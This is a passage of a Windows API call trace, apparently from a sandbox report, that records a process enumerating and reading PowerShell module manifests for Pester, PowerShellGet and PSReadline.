dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.812] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.812] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.812] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.812] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.813] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.813] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.813] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.813] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.813] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.813] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.813] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0281.814] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0281.814] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0281.814] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0281.814] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0281.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.814] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0281.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.814] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.815] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.815] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.815] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.815] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0281.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.815] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0281.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0281.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.816] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x950 [0281.816] GetFileType (hFile=0x950) returned 0x1 [0281.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.816] GetFileType (hFile=0x950) returned 0x1 [0281.816] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c4195c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c4195c0*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c4195c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c4195c0*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c4195c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c4195c0*, lpNumberOfBytesRead=0x653ef8c948*=0x1000, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c4195c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c4195c0*, lpNumberOfBytesRead=0x653ef8c948*=0x5e5, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c418ae5, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c418ae5*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.816] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c4195c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c4195c0*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.816] CloseHandle (hObject=0x950) returned 1 [0281.818] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0281.819] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0281.819] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0281.819] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0281.819] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0281.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0281.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0281.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c730) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c660) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c620) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c740) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c700) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c790) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c6c0) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c680) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0281.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbf0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cbb0) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cc40) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb70) returned 1 [0281.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb30) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 